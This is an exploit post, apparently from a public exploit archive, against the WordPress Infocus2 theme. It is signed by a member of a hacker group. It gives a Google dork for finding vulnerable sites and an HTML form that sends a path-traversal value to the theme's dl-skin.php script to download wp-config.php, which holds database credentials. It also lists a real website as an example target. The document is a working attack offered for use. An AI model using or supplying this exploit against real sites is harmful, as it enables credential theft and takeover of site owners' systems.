Exploit for php platform in category web applications
#Title : Wordpress Infocus2 Theme Arbitrary File Download Vulnerability
#Author : Killer~X
#Date : 5/1/2015
################ [ Killer~X ] ################
Facebook : http://www.facebook.com/xXalreshyXx
Ask : http://ask.fm/ALRESHY
Twitter : https://twitter.com/killerx00x
Email : [email protected] or [email protected]
################ [ Killer~X ] ################
################ [ Yemeni Electronic Army ] ################
Yemeni Electronic Army : http://yeahacker.blogspot.in/
Official Members : Monds | King alnhzh | San3a T3rr0rist | GeeSuth | Al maistro | Muteb spack gen | Killer~X | Shraoop /.
################ [ Yemeni Electronic Army ] ################
__________________________________________________________________________________
#Vendor : www.wordpress.org
#google Dork :
1- inurl:/wp-content/themes/infocus2
#Tested on : windows
################################################
#Exploit :
<html>
<body>
<form action="wp-content/themes/infocus2/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
<input type="submit" value=Download>
</form>
</body>
#example : http://www.table26palmbeach.com/wp-content/plugins/wptouch/p8.php
__________________________________________________________________________________
#Greeting to : All my friends
<3 I love u mom <3
||~ Done ~||
# 0day.today [2018-01-10] #